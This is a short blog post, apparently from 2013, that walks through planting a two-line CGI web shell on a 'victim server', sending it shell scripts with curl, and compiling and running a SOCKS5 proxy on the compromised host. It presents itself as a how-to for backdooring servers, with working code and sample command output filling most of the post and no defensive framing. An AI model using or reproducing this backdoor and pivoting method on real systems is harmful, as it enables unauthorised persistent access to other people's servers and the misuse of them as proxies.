Buy it, use it, break it, fix it, plug it, play it, burn it, rip it, drag and drop it, zip- unzip it: Simplest remote shell

Friday, December 20, 2013

Simplest remote shell

Any true webmaster at least once has installed some remote shells (backdoors) to victim servers. I've used the simplest backdoor ever existed.
First create file sh.cgi and upload it to the victim server (don't forget to set execute permissions)

#!/bin/sh

/bin/sh

That is all our remote shell implementation. Locally create file lets say with the name 1

echo -e "Content-Type: text/plain\r\n\r"
uname -a
id
exit 0

Test it

> curl --data-binary @1 http://host/sh.cgi
Linux *** 2.6.26-1-amd64 #1 SMP Fri Mar 13 17:46:45 UTC 2009 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

If you are lucky you can upload files, compile them and run

echo -e "Content-Type: text/plain\r\n\r"
cc socks.c 2>&1
./a.out 2>&1
exit 0

Download socks.c. Imlements SOCKS5, addresses are harcoded.

Buy it, use it, break it, fix it, plug it, play it, burn it, rip it, drag and drop it, zip- unzip it

Friday, December 20, 2013

Simplest remote shell

No comments:

Post a Comment